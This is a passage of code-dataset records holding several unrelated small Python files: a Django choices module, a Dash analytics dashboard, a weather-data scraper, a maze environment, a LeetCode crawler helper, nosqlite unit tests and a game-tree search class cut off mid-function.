Admission', 'Accepted for Admission' ),\r\n ( 'Rejected for Admission', 'Rejected for Admission' ),\r\n )\r\n\r\nONLINE_STATUS = ( \r\n ( 'Incomplete', 'Incomplete' ),\r\n ( 'Failure', 'Failure' ),\r\n ( 'Success', 'Success' ),\r\n )\r\n\r\nORDER_STATUS = ( \r\n ( 'Application Pending', 'Application Pending' ),\r\n ( 'Photo Awaited', 'Photo Awaited' ),\r\n ( 'Payment Awaited', 'Payment Awaited' ),\r\n ( 'Payment Received', 'Payment Received' ),\r\n ( 'Application Submitted', 'Application Submitted' ),\r\n )\r\nORDER_TYPE = ( \r\n ( 'Online', 'Online' ),\r\n ( 'Offline', 'Offline' )\r\n )\r\n\r\nAPPLICATION_STATUS = ( \r\n ( 'Waiting for Payment', 'Waiting for Payment' ),\r\n ( 'Docs Verified', 'Docs Verified' ),\r\n ( 'Submitted To College', 'Submitted to College' ),\r\n )\r\nAPP_NATURE = ( \r\n ( 'Paid Application', 'Paid Application' ),\r\n ( 'Discounted Application', 'Discounted Application' ),\r\n ( 'Free Application', 'Free Application' ),\r\n )\r\n\r\nEXTRA_IMAGES_TYPE = ( \r\n ( 'Signature', 'Signature' ),\r\n ( 'Mother Signature', 'Mother Signature' ),\r\n ( 'Father Signature', 'Father Signature' ),\r\n ( 'Thumb', 'Thumb' ),\r\n ( 'Mail Address', 'Mail Address' ),\r\n ( 'Pmnt Address', 'Pmnt Address' ),\r\n )\r\n\r\nWORKFLOW = ( \r\n ( 'Shortlisted', 'Shortlisted' ),\r\n ( 'Completed', 'Completed' ),\r\n )\r\n\r\nRESULT_LIST = ( \r\n ( 0, 'Rejected' ),\r\n ( 1, 'Accepted' ),\r\n )\r\n\r\n","sub_path":"zlpbyyrtrsbez/studentinfo/choices.py","file_name":"choices.py","file_ext":"py","file_size_in_byte":2730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"297334920","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nimport plotly.graph_objs as go\nfrom datetime import datetime\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\ndb = 'zen'\ndb_config = {'user': 'my_user',\n 'pwd': 'my_user_password',\n 'host': 'localhost',\n 'port': 5432,\n 'db': db}\nengine = create_engine('postgresql://{}:{}@{}:{}/{}'.format(db_config['user'],\n db_config['pwd'],\n db_config['host'],\n db_config['port'],\n db_config['db']))\n\n# получаем данные\nquery = '''\n SELECT * FROM dash_visits\n '''\ndash_visits = pd.io.sql.read_sql(query, con = engine)\ndash_visits['dt'] = pd.to_datetime(dash_visits['dt'])\n\nquery = '''\n SELECT * FROM dash_engagement\n '''\ndash_engagement = pd.io.sql.read_sql(query, con = engine)\ndash_engagement['dt'] = pd.to_datetime(dash_engagement['dt']).dt.round('min')\n\n# note = '''\n# Этот дашборд показывает: сколько взаимодействий пользователей с карточками происходит в системе с разбивкой по темам карточек, \n# как много событий генерируют источники с разными темами,\n# насколько хорошо пользователи конвертируются из показов карточек в просмотры статей. 
\n# Используйте выбор интервала даты показа, возрастных категорий и тем карточек для управления дашбордом.\n# '''\n\n# задаём лейаут\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets, compress=False)\napp.layout = html.Div(children=[ \n # формируем html\n html.H1(children = 'Анализ взаимодействия пользователей с карточками статей в Яндекс.Дзен'),\n html.H5(children = 'Этот дашборд показывает:'),\n html.H5(children = ' * сколько взаимодействий пользователей с карточками происходит в системе с разбивкой по темам карточек,'),\n html.H5(children = ' * как много событий генерируют источники с разными темами,'),\n html.H5(children = ' * насколько хорошо пользователи конвертируются из показов карточек в просмотры статей.'),\n html.Label('Используйте выбор интервала даты показа, возрастных категорий и тем карточек для управления дашбордом.'),\n #html.Label(note),\n html.Br(),\n html.Div([\n \n html.Div([\n # выбор временного периода\n html.Label('Дата:'),\n dcc.DatePickerRange(\n start_date = dash_visits['dt'].min(),\n end_date = dash_visits['dt'].max(),\n display_format = 'YYYY-MM-DD',\n id = 'dt_selector', \n ),\n html.Br(),\n html.Br(),\n html.Label('Возрастные категории:'),\n dcc.Dropdown(\n options = [{'label': x, 'value': x} for x in dash_visits['age_segment'].unique()],\n value = dash_visits['age_segment'].unique().tolist(),\n multi = True,\n id = 'age-dropdown'\n ), \n ], className = 'six columns'),\n \n html.Div([\n html.Label('Темы карточек:'),\n dcc.Dropdown(\n options = [{'label': x, 'value': x} for x in dash_visits['item_topic'].unique()],\n value = dash_visits['item_topic'].unique().tolist(),\n multi = True,\n id = 'item-topic-dropdown'\n ),\n ], className = 'six columns'),\n\n ], className = 'row'),\n\n html.Br(),\n\n html.Div([\n \n html.Div([\n html.H5('История событий по темам карточек:'),\n dcc.Graph(style = {'height': '50vw'},\n id = 'history-absolute-visits'\n ), \n ], className = 'six columns'), \n \n html.Div([\n html.H5('Разбивка событий по темам источников:'),\n dcc.Graph(style = {'height': '25vw'},\n id = 'pie-visits'\n ),\n html.H5('Глубина взаимодействия'),\n html.Label('среднее количество пользователей в минуту:'),\n dcc.Graph(style = {'height': '25vw'},\n id = 'engagement-graph'\n ),\n ], className = 'six columns'), \n \n ], className = 'row'),\n html.Br(),\n html.Br(),\n html.Br(),\n html.Br(),\n\n ])\n\n# описываем логику дашборда\n@app.callback(\n [Output('history-absolute-visits', 'figure'),\n Output('pie-visits', 'figure'),\n Output('engagement-graph', 'figure'),\n ],\n [Input('item-topic-dropdown', 'value'),\n Input('age-dropdown', 'value'),\n Input('dt_selector', 'start_date'),\n Input('dt_selector', 'end_date'),\n ])\ndef update_figures(selected_item_topics, selected_ages, start_date, end_date):\n\n # График истории событий по темам карточек\n items = (dash_visits\n .query('item_topic.isin(@selected_item_topics) and \\\n dt >= @start_date and dt <= @end_date and \\\n age_segment.isin(@selected_ages)')\n .groupby(['item_topic', 'dt'], as_index=False)\n .agg({'visits': 'sum'})\n .sort_values('visits', ascending=False)\n )\n data_by_item_topic = []\n for item_topic in items['item_topic'].unique():\n data_by_item_topic += [go.Scatter(x = items.query('item_topic == @item_topic')['dt'],\n y = items.query('item_topic == @item_topic')['visits'],\n mode = 'lines',\n stackgroup = 'one',\n name = item_topic)]\n\n # График разбивки событий по темам источников\n report = 
(dash_visits\n .query('item_topic.isin(@selected_item_topics) and \\\n dt >= @start_date and dt <= @end_date and \\\n age_segment.isin(@selected_ages)')\n .groupby('source_topic', as_index=False)\n .agg({'visits': 'sum'})\n )\n data_by_source_topic = [go.Pie(labels = report['source_topic'],\n values = report['visits'], \n showlegend = False,\n textposition = 'outside',\n texttemplate = '%{label} %{percent:.1%}',\n title_position = 'top center'\n )]\n\n # График средней глубины взаимодействия\n report = (dash_engagement\n .query('item_topic.isin(@selected_item_topics) and \\\n dt >= @start_date and dt <= @end_date and \\\n age_segment.isin(@selected_ages)')\n .groupby('event', as_index=False)\n .agg({'unique_users': 'mean'})\n .rename(columns={'unique_users': 'avg_unique_users'})\n .sort_values('avg_unique_users', ascending=False)\n )\n data_by_event = [go.Bar(x = report['event'],\n y = report['avg_unique_users'],\n text = report['avg_unique_users'].round(1),\n textposition = 'auto',\n width = 0.5)]\n\n # формируем результат для отображения\n return (\n {\n 'data': data_by_item_topic,\n 'layout': go.Layout(xaxis = {'title': 'Дата'},\n yaxis = {'title': 'Количество визитов'}\n )\n },\n {\n 'data': data_by_source_topic, \n 'layout': go.Layout(xaxis = {'title': 'Тема источника'},\n yaxis = {'title': 'Количество визитов'},\n #font_size = 11,\n #height = 500,\n )\n }, \n {\n 'data': data_by_event, \n 'layout': go.Layout(xaxis = {'title': 'Событие'},\n yaxis = {'title': f'Среднее количество пользователей'}\n )\n },\n ) \n\nif __name__ == '__main__':\n app.run_server(debug = True, host='0.0.0.0')","sub_path":"Project_10_yandex_zens_dashboard/dashboard/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":9305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"592557724","text":"from menu.image import Image\n\n\nclass Level:\n _LEVEL1_IMAGE_PATH = 'menu/level1.png'\n _LEVEL2_IMAGE_PATH = 'menu/level2.png'\n _LEVEL3_IMAGE_PATH = 'menu/level3.png'\n\n def __init__(self):\n self.current_level = 1\n self.levels = {1: 14, 2: 21, 3: 28}\n self.images = [Image(250, 100, self._LEVEL1_IMAGE_PATH), Image(250, 100, self._LEVEL2_IMAGE_PATH),\n Image(250, 100, self._LEVEL3_IMAGE_PATH)]\n self.duration = 180\n\n def show(self, screen):\n if self.duration > 0:\n self.images[self.current_level - 1].show(screen)\n self.duration -= 1\n\n def update(self):\n if self.levels[self.current_level] == 0 and self.current_level < 3:\n self.current_level += 1\n self.duration = 180\n","sub_path":"level.py","file_name":"level.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"316641989","text":"'''\nCalls Weather Underground API for Hourly Weather Data\nfor April 2015\n'''\n\nimport requests\nimport csv\nimport time\nfrom datetime import date\nfrom dateutil.rrule import rrule, DAILY\n\nwith open('april_wu1.csv', 'w') as f:\n writer = csv.writer(f)\n writer.writerow(['hour', 'day', 'month', 'year', 'precipitation_in', 'temp_f', 'temp_c', 'humidity'])\n \n urlstart = 'http://api.wunderground.com/api/[API_KEY]/history_'\n urlend = '/q/NY/New_York.json'\n \n st = date(2015, 4, 1)\n end = date(2015, 4, 30)\n \n for dt in rrule(DAILY, dtstart=st, until=end):\n d = requests.get(urlstart + str(dt.strftime(\"%Y%m%d\")) + urlend).json()\n try:\n for h in d['history']['observations']:\n writer.writerow([h['date']['hour'], h['date']['mday'], h['date']['mon'], 
h['date']['year'],\n                                 h['precipm'], h['tempi'], h['tempm'], h['hum']])\n        except KeyError:\n            # back off for ten minutes, then retry the same day once\n            time.sleep(600)\n            d = requests.get(urlstart + str(dt.strftime(\"%Y%m%d\")) + urlend).json()\n            for h in d['history']['observations']:\n                writer.writerow([h['date']['hour'], h['date']['mday'], h['date']['mon'], h['date']['year'],\n                                 h['precipm'], h['tempi'], h['tempm'], h['hum']])","sub_path":"kevin/weather_scrape.py","file_name":"weather_scrape.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"207394993","text":"# https://atcoder.jp/contests/dp/tasks/dp_f?lang=ja\n\n# get LCS length\ndef lcs_len(s1, s2):\n    n1, n2 = len(s1), len(s2)\n    dp = [[0] * (n2 + 1) for _ in range(n1 + 1)]\n    for i in range(1, n1 + 1):\n        for j in range(1, n2 + 1):\n            dp[i][j] = max(dp[i-1][j], dp[i][j-1])\n            if s1[i-1] == s2[j-1]: dp[i][j] = dp[i-1][j-1] + 1\n    return dp[-1][-1]\n\n# read the two input strings before calling the solver\ns1 = input()\ns2 = input()\nans = lcs_len(s1, s2)\nprint(ans)","sub_path":"0_libraries/py_typicals/LCS.py","file_name":"LCS.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"290821034","text":"import sys\n\nclass environment:\n\t\n\tdef __init__(self, filename):\n\t\tself.filename = filename\n\t\tself.step_reward = -1\n\n\t\tmaze = []\n\t\twith open(filename, \"r\") as f:\n\t\t\trow = f.readline()\n\t\t\twhile row:\n\t\t\t\trow = row.strip(\"\\n\")\n\t\t\t\tmaze.append(list(row))\n\t\t\t\trow = f.readline()\n\n\t\tself.V = {}\n\t\tself.goal = (-1, -1)\n\t\tfor i in range(len(maze)):\n\t\t\tfor j in range(len(maze[0])):\n\t\t\t\tif maze[i][j] != \"*\":\n\t\t\t\t\tself.V[(i,j)] = 0\n\t\t\t\tif maze[i][j] == \"G\":\n\t\t\t\t\tself.goal = (i,j)\n\t\t\t\t\tself.end_state = (i,j)\n\t\t\t\tif maze[i][j] == \"S\":\n\t\t\t\t\tself.init_state = (i,j)\n\n\t\tself.cur_state = self.init_state\n\n\tdef step(self, a):\n\n\t\tif self.cur_state == self.end_state:\n\t\t\treturn self.cur_state, 0, 1\n\n\t\tnext_state = (self.cur_state[0] + a[0], self.cur_state[1] + a[1])\n\t\tnext_state = self.cur_state if (next_state not in self.V) else next_state\n\t\tself.cur_state = next_state\n\n\t\treward = self.step_reward\n\t\tis_terminal = 1 if next_state == self.goal else 0\n\n\t\treturn next_state, reward, is_terminal\n\n\tdef reset(self):\n\t\tself.cur_state = self.init_state\n\t\treturn self.init_state\n\n# maze_input = \"medium_maze.txt\"\n# output_file = \"output.feedback\"\n# action_seq_file = \"medium_maze_action_seq.txt\"\nmaze_input = sys.argv[1]\noutput_file = sys.argv[2]\naction_seq_file = sys.argv[3]\n\nactions = [(0,-1), (-1,0), (0,1), (1,0)]\n\nmaze_solver = environment(maze_input)\n\nwith open(action_seq_file, \"r\") as f:\n\taction_seq = f.readline().strip().split(\" \")\n\taction_seq = [int(e) for e in action_seq]\n\nwith open(output_file, \"w\") as f:\n\tfor i in action_seq:\n\t\tnext_state, reward, is_terminal = maze_solver.step(actions[i])\n\t\tres = str(next_state[0]) + \" \" + str(next_state[1]) + \" \" + str(reward) + \" \" + str(is_terminal) + \"\\n\"\n\t\tf.write(res)\n","sub_path":"environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"296644212","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport scipy.stats\nimport matplotlib.pyplot as plt\nfrom parameter_estimation import confidence_interval as ci\n\ndef calc_CI_bounds(n_obs, bkg, 
alpha=0.05):\n\n lambda_CI_LL_twosided, lambda_CI_UL_twosided = ci.poisson_two_sided(n_obs, alpha=alpha)\n lambda_CI_UL_onesided = ci.poisson_upper(n_obs, alpha=alpha)\n lambda_CI_UL_onesided_CLs = ci.poisson_upper_CLs(n_obs, bkg, alpha=alpha)\n\n return lambda_CI_LL_twosided, lambda_CI_UL_twosided, lambda_CI_UL_onesided, lambda_CI_UL_onesided_CLs\n\n\ndef show_confidence_intervals_with_CLs(experiments, theta_true, xmin_inf = -1e10, figsize=(10,8)):\n\n fig, axes = plt.subplots(ncols=2, figsize=figsize)\n ax = axes.flatten()\n\n yshift = 0.4\n\n for i, experiment in enumerate(experiments):\n n = experiment[0]\n ll_2s = experiment[1]\n ul_2s = experiment[2]\n ul_1s = experiment[3]\n ul_1s_CLs = experiment[4]\n ax[0].scatter(n, 2*i, c='navy',)\n ax[1].scatter(n, 2*i, c='navy',)\n ax[1].scatter(n, 2*i+yshift, c='navy',)\n ax[0].hlines(2*i, xmin=ll_2s, xmax=ul_2s, colors='r')\n ax[1].hlines(2*i, xmin=xmin_inf, xmax=ul_1s, colors='purple')\n ax[1].hlines(2*i+yshift, xmin=xmin_inf, xmax=ul_1s_CLs, colors='forestgreen')\n\n ax[0].axvline(theta_true, linestyle='--', label=r\"$\\theta_{true}$\", c='k')\n ax[1].axvline(theta_true, linestyle='--', label=r\"$\\theta_{true}$\", c='k')\n \n ax[0].scatter(experiments[0,0], 0, c='navy', label='$n_{obs}$')\n ax[1].scatter(experiments[0,0], 0, c='navy', label='$n_{obs}$')\n \n ax[0].hlines(9, xmin=experiments[0,1], xmax=experiments[0,2], colors='r', label='Two-sided CI')\n ax[1].hlines(0, xmin=xmin_inf, xmax=experiments[0,3], colors='purple', label='One-sided, upper bound CI')\n ax[1].hlines(yshift, xmin=xmin_inf, xmax=experiments[0,4], colors='forestgreen', label=r'One-sided, upper bound CI from $CL_{s}$')\n\n ax[0].legend()\n ax[1].legend(loc='upper left', bbox_to_anchor=(1,1))\n \n ax[0].set_xlim(0.0, 30.0)\n ax[1].set_xlim(0.0, 30.0)\n\n ax[0].get_yaxis().set_visible(False)\n ax[1].get_yaxis().set_visible(False)\n\n ax[0].set_title(r\"Two-sided confidence interval\")\n ax[1].set_title(r\"One-sided, upper bounded confidence interval\")\n \n return fig, ax\n","sub_path":"applications/HEP/hepstat.py","file_name":"hepstat.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"338409392","text":"# -*- coding: utf-8 -*-\n# @Author: Tianxiao Yang\n# @Date: 2017-06-12 20:28:36\n# @Last Modified by: Tianxiao Yang\n# @Last Modified time: 2017-06-19 14:49:01\nfrom util.common import *\n\n\nclass QuestionContent:\n\n # This class cannot be re-loaded when not saved\n is_loaded_table = {}\n\n reg = '.*---{0}_BEGIN---\\n(.*?)\\n---{0}_END---.*'\n sep = '---{0}_BEGIN---\\n{1}\\n---{0}_END---\\n'\n\n def __init__(self):\n self.f_text = \"\"\n self.content = \"\"\n self.script_arr = []\n self.is_locked = False\n self.problem_id = None\n\n def __str__(self):\n return str(self.problem_id) + \".txt\"\n\n def load(self, problem_id, new=False):\n\n if self.problem_id is not None:\n elog(\"Duplicate QuestionContent Loading Error\", \"question content with id: {0} is trying to load again\".format(self.problem_id)) \n\n if self.problem_id in QuestionContent.is_loaded_table and QuestionContent.is_loaded_table[self.problem_id]:\n elog(\"Duplicate QuestionContent Loading Error\", \"question content is trying to load before other object save their data\")\n\n # only read content when the problem content is not new content\n if not new:\n # this has to be str(problem_id), because self.problem_id is the identifier for this object,\n # I have to set it at the end of the function\n text = 
read_file(DATA_CONTENT_PATH, str(problem_id) + \".txt\")\n if text == \"locked\":\n print('problem: {0} is locked'.format(self.problem_id))\n self.is_locked = True\n if not text:\n print(\"load question: {0} content failed\".format(self.problem_id))\n self.f_text = text\n\n self.problem_id = str(problem_id)\n QuestionContent.is_loaded_table[self.problem_id] = True\n\n def get_content(self):\n if self.is_locked:\n return \"locked\"\n if self.content == \"\":\n if self.problem_id is None:\n elog('Get Content Error', 'problem has not been loaded yet')\n self.content = self.parse_content(self.f_text)\n return self.content\n\n \"\"\"\n This method return a encoded string as script\n \"\"\"\n def get_script(self, s_type):\n if self.is_locked:\n return \"locked\"\n if not self.script_arr:\n if self.problem_id is None:\n elog('Get Script Error', 'problem has not been loaded yet')\n if s_type not in ['cpp', 'java', 'python']:\n elog('Get Script Error', 'script type: {0} not supported'.format(s_type))\n script_text = self.parse_script(self.f_text)\n self.script_arr = JSONLoads(script_text)\n if not self.script_arr:\n elog(\"\", \"failed to load script_text in problem: {0} type: {1}\".format(self.problem_id, s_type))\n res = \"ERROR\"\n try:\n res = list(filter(lambda script: script['value'] == s_type, self.script_arr))[0]['defaultCode']\n except IndexError as err:\n elog(err, \"Failed to get default code\")\n return res\n\n def parser(self, p_type, f_text):\n match_obj = re.match(QuestionContent.reg.format(p_type), f_text, flags=re.DOTALL)\n if match_obj:\n return match_obj.group(1)\n else:\n elog(\"Problem Parsing Error\", \"Failed to parse \" + p_type + \" for problem: {0}\".format(self.problem_id))\n\n def parse_content(self, f_text):\n return self.parser(\"CONTENT\", f_text)\n\n def parse_script(self, f_text):\n return self.parser(\"SCRIPT\", f_text)\n\n @staticmethod\n def clear_string(s):\n\n s = replace_newline_tab(s).replace(\"'\", \"====\").replace('\"', \"'\").replace(\"====\", '\"')[:-2] + \"]\"\n s = re.sub('\\w+(\")s', \"'\", s)\n match_obj = re.match('.*\"(.)\".*', s)\n try:\n s = re.sub('(\"[^Cc]\")', \"'{0}'\".format(match_obj.group(1)), s)\n except:\n print('no C default code')\n return s\n\n def set_content(self, content):\n # html contains escaped unicode character\n content = content.encode('utf-8').decode('unicode_escape')\n self.content = content\n\n \"\"\"\n Usage: get script from leetcode.com and parse it to json then store to data\n \"\"\"\n def set_script(self, script):\n # html contains escaped unicode character\n script = script.encode('utf-8').decode('unicode_escape')\n clear_script = self.clear_string(script)\n self.script_arr = JSONLoads(clear_script)\n if not self.script_arr:\n elog('', \"failed when loads json string with id: {0}\".format(self.problem_id))\n write_file(clear_script, DATA_TMP_PATH, '{0}-error.json'.format(self.problem_id))\n\n \"\"\"\n Call this function when the problem is locked\n \"\"\"\n def set_locked(self):\n self.is_locked = True\n\n def save(self):\n if self.problem_id is None:\n elog('Save Content Error', 'problem has not been loaded yet')\n\n if self.is_locked:\n self.f_text = \"locked\"\n else:\n self.f_text = ''.join(\n [\n QuestionContent.sep.format('CONTENT', self.content),\n QuestionContent.sep.format('SCRIPT', JSONDumps(self.script_arr))\n ])\n\n write_file(self.f_text, DATA_CONTENT_PATH, self.problem_id + \".txt\")\n\n QuestionContent.is_loaded_table[self.problem_id] = False\n self.f_text = \"\"\n self.content = \"\"\n self.script_arr 
= []\n        print(\"problem: {0} saved\".format(self.problem_id), end='\\r')\n        self.problem_id = None\n","sub_path":"leet_crawler/leet_crawler/util/questioncontent.py","file_name":"questioncontent.py","file_ext":"py","file_size_in_byte":5627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"482976700","text":"# encoding: utf8\n\nimport unittest\nimport nosqlite\n\nclass Test(unittest.TestCase):\n    def setUp(self):\n        self.client = nosqlite.Client('.')\n        self.database = self.client.memory\n\n    def test_unicode_string(self):\n        collection = self.database.index\n        dummy = nosqlite.Client(u'.')  # the constructor should accept a unicode path too\n\n        collection.insert({'data':u'111'})\n        collection.insert({u'xxx':u'table'})\n        collection.copy(u'collection2')\n\n        collection.insert({'a': u'あいうえお'})\n\n        r = collection.find_one(fields=[u'data'])\n        self.assertDictEqual({'data':'111'}, r)\n\n    def test_keyword_escape(self):\n        collection = self.database.index\n\n        data = {'index':'index'}\n\n        # insert\n        collection.insert(data)\n        collection.insert({'drop':'table'})\n\n        # find\n        self.assertDictEqual(data, collection.find_one(index='index'))\n        self.assertDictEqual(data, collection.find_one(index='index', fields=[\"index\"]))\n\n        # update\n        collection.update(data, index='index')\n\n        # rename\n        collection.rename('table')\n        collection.rename('index')\n\n        # copy\n        collection.copy('create')\n\n        # delete\n        collection.delete(index='index')\n        collection.delete()\n\n    def test_nonexist_field(self):\n        collection = self.database.collection\n        data = {'key1':'val1', 'key2':'val2'}\n        collection.insert(data)\n\n        self.assertEqual(data, collection.find_one(key1='val1', fields=['key1','key2','key3']))\n\n    def test_range_query(self):\n        collection = self.database.collection\n        collection.insert({'data': 5})\n        collection.insert({'data':15})\n\n        self.assertEqual([{'data':5}], list(collection.find('data > 0 AND data < 10')))\n        self.assertEqual({'data':5}, collection.find_one('data > 0 AND data < 10'))\n        self.assertEqual([{'data':5}], list(collection.find('data > ? AND data < ?', t=[0, 10])))\n        self.assertEqual({'data':5}, collection.find_one('data > ? 
AND data < ?', t=[0, 10]))\n\n def test_sql_injection(self):\n collection = self.database.collection\n data = {'data':\"'\\\"\"}\n collection.insert(data)\n\n self.assertEqual(data, collection.find_one(data=\"'\\\"\"))\n self.assertEqual(data, collection.find_one('data=?', t=[\"'\\\"\"]))\n\n collection.update({'data':\"'\\\"\"}, data=\"'\\\"\")\n collection.update({'data':\"'\\\"\"}, 'data=?', t=[\"'\\\"\"])\n\n collection.copy('collection2', data=\"'\\\"\")\n collection.copy('collection3', 'data=?', t=[\"'\\\"\"])\n\n collection.delete(data=\"'\\\"\")\n collection.delete('data=?', t=[\"'\\\"\"])\n\n def test_query_as_dict(self):\n collection = self.database.collection\n collection.insert([{'foo':i, 'bar':i+1} for i in range(1, 100)])\n\n self.assertEqual([{'foo':50, 'bar':51}], list(collection.find({'foo':50})))\n self.assertEqual({'foo':50, 'bar':51}, collection.find_one({'foo': 50}))\n\n self.assertEqual({'foo':50, 'bar':51}, collection.find_one('foo=?', t=[50], bar=51))\n self.assertEqual({'foo':50, 'bar':51}, collection.find_one({'foo': 50}, bar=51))\n\n self.assertEqual([], list(collection.find({'foo': 50}, bar=50)))\n\n self.assertEqual(50, len(list(collection.find({'foo <=':50}))))\n self.assertEqual(49, len(list(collection.find({'foo < ':50}))))\n self.assertEqual(50, len(list(collection.find({'foo >=':50}))))\n self.assertEqual(49, len(list(collection.find({'foo > ':50}))))\n self.assertEqual( 1, len(list(collection.find({'foo = ':50}))))\n self.assertEqual(98, len(list(collection.find({'foo <>':50}))))\n self.assertEqual(98, len(list(collection.find({'foo !=':50}))))\n self.assertEqual( 1, len(list(collection.find({'foo <=':50, 'foo >=':50}))))\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"22047827","text":"import copy\nfrom abc import ABC, abstractmethod\nfrom collections import defaultdict\nimport math\nimport numpy as np\nimport random\nimport time\nfrom scipy.integrate import quad\nfrom CVIBES.PrioritizedItem import PrioritizedItem\nfrom queue import PriorityQueue\n\ndef corner_heuristic(board, previous_move_size):\n sum = 0\n\n count_heuristic = 0\n for x in range(6):\n for y in range(6):\n if board.tup66[x][y]!=0:\n sum+=1\n count_heuristic+=board.tup66[x][y]\n count_heuristic = count_heuristic/sum\n if not board.is_max:\n move_size = len(board.get_legal_moves( -1))\n move_heuristic = (previous_move_size - move_size) / (move_size + previous_move_size)\n else:\n move_size = len(board.get_legal_moves( 1))\n move_heuristic = (move_size - previous_move_size) / (move_size + previous_move_size)\n corner_heuristic = board.tup[0][0] + board.tup[5][5] + board.tup[5][0] +board.tup[0][5]\n corner_heuristic = corner_heuristic / 4\n border_heuristic = 0\n for i in range(1,4):\n border_heuristic += board.tup[0][i] + board.tup[i][5] + board.tup[5][i] +board.tup[i][0]\n border_heuristic = border_heuristic/16\n return count_heuristic*0.1 + move_heuristic*0.15+corner_heuristic*0.65+border_heuristic*0.1\n\n\n\nclass SearchAlgorithm():\n def __init__(self, root):\n self.children = dict() # children of each node\n self.child_to_father = dict()\n self.alpha = dict()\n self.beta1 = dict()\n\n self.conspiracy_queue = []\n self.BSM_K = 5\n self.BSM_N = 2\n self.node_to_path = dict()\n self.node_to_path_CVIBES = dict()\n self.node_to_dry_Us = dict()\n self.node_to_dry_Us[root] = [(root.meanvalue, 1.0)]\n 
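# leaves queued for expansion; filled and drained by the FT Greedy and conspiracy (CVIBES) selection paths\n        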
self.node_to_pick = []\n\n def _compute_Us_for_all_children(self, node, s):\n # self._mark_all_S_ancestors(s)\n return self._compute_Us(node, s, return_children=True)\n\n def _compute_Us_for_node(self, node, s):\n # self._mark_all_S_ancestors(s)\n return self._compute_Us(node, s, return_children=False)[0]\n\n # Example:\n # distributions = [[(4, 0.2), (6, 0.5), (7, 1.0)], [(3, 0.4), (4, 0.6), (5, 1.0)]]\n def compute_max_probability(self, distributions, is_max=True):\n queue = PriorityQueue()\n ret_dist = []\n chance_of_every_distribution_to_be_lower_than_current_value = []\n num_of_chances_that_are_not_one_anymore = 0\n multiplied_chance = 1\n last_diff = 1\n last_distribution_cdf_used = 1\n for i in range(len(distributions)):\n if len(distributions) == 0 or len(distributions[i]) == 0 or len(distributions[i][0]) == 0:\n print(\"Zura\")\n if is_max:\n queue.put(PrioritizedItem(distributions[i][0][0], (i, distributions[i][0][1], 0)))\n else:\n if len(distributions[i]) == 1:\n chance = 1\n else:\n chance = 1 - distributions[i][-2][1]\n queue.put(PrioritizedItem(-distributions[i][-1][0], (i, chance, len(distributions[i]) - 1)))\n chance_of_every_distribution_to_be_lower_than_current_value.append(1)\n while not queue.empty():\n lowest_or_highest_value = queue.get()\n\n i = lowest_or_highest_value.item[0]\n j = lowest_or_highest_value.item[2]\n # The chance for all other distriubutions to be lower/equal than the value, and for the distribution that contained it to be that exact value\n diff = (lowest_or_highest_value.item[1] - chance_of_every_distribution_to_be_lower_than_current_value[i])\n cdf_of_current_distribution = chance_of_every_distribution_to_be_lower_than_current_value[\n lowest_or_highest_value.item[0]]\n\n if num_of_chances_that_are_not_one_anymore == len(distributions):\n\n if (last_diff * cdf_of_current_distribution) == 0:\n print(\"last_diff:\", last_diff)\n print(\"cdf_of_current_distribution:\", cdf_of_current_distribution)\n multiplied_chance_backup = multiplied_chance\n multiplied_chance *= diff * last_distribution_cdf_used / (last_diff * cdf_of_current_distribution)\n\n if multiplied_chance == 0:\n multiplied_chance = multiplied_chance_backup\n else:\n last_distribution_cdf_used = lowest_or_highest_value.item[1]\n last_diff = diff\n ret_dist.append([lowest_or_highest_value.priority, multiplied_chance])\n\n else:\n\n multiplied_chance *= lowest_or_highest_value.item[1] / \\\n chance_of_every_distribution_to_be_lower_than_current_value[i]\n\n if chance_of_every_distribution_to_be_lower_than_current_value[i] == 1:\n num_of_chances_that_are_not_one_anymore += 1\n if num_of_chances_that_are_not_one_anymore == len(distributions):\n ret_dist.append([lowest_or_highest_value.priority, multiplied_chance])\n\n chance_of_every_distribution_to_be_lower_than_current_value[i] = lowest_or_highest_value.item[1]\n\n if is_max and j < len(distributions[i]) - 1:\n chance = distributions[i][j + 1][1]\n queue.put(PrioritizedItem(distributions[i][j + 1][0], (i, chance, j + 1)))\n elif not is_max and j > 0:\n if j == 1:\n chance = 1\n else:\n chance = 1 - distributions[i][j - 2][1]\n queue.put(PrioritizedItem(-distributions[i][j - 1][0], (i, chance, j - 1)))\n\n if not is_max:\n ret_dist = reversed(ret_dist)\n ret_dist = [[-item[0], item[1]] for item in ret_dist]\n\n culmative = 0\n real_ret_dist = []\n for item in ret_dist:\n real_ret_dist.append((item[0], item[1] + culmative))\n culmative += item[1]\n\n if 20 < len(real_ret_dist):\n while 20 < len(real_ret_dist):\n approximated_ret_dist = 
